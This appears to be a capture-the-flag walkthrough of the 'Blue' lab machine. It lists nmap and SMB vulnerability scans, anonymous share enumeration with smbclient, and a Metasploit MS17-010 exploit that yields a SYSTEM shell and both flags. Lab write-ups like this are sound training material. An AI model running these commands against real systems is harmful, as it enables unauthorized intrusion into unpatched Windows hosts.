
Ping

ping 10.10.10.40

Nmap default Scan

nmap 10.10.10.40 -oN dnmap

Script and Service Scan

nmap 10.10.10.40 -sC -sV -oN snmap

All port Scan

nmap 10.10.10.40 -sC -sV -p- -T5 --open -oN anmap

No new ports found; the results are the same as the script and service scan.

Smb Script Scan

nmap --script smb-vuln* --script smb-enum-users.nse 10.10.10.40

It is vulnerable, as expected.

Smb Enumeration

smbclient -U '' -L \\\\10.10.10.40\\

We got some interesting shares; let's enumerate them.

smbclient -N //10.10.10.40/share

No useful files in ‘share’; will try ‘users’.

smbclient -N //10.10.10.40/users

This looks interesting; let's enumerate further.

All the files in the screenshots below came from the SMB share Users.

Couldn’t find any useful information after analysing the files I got from the SMB shares.

Will jump back to the vulnerability we found for SMB.

Will use Metasploit

Will Search for exploits

search ms17-010
use 2

Will set LHOST, RHOST

set LHOST 10.10.14.61
set RHOST 10.10.10.40
exploit

We got a shell

shell
whoami

We landed as NT AUTHORITY, so there is no need for privilege escalation.

Got user.txt on user haris's Desktop

type user.txt
ipconfig

Got the root flag on the Administrator's Desktop

type root.txt
ipconfig

We are done with BLUEEEEEEEE…:)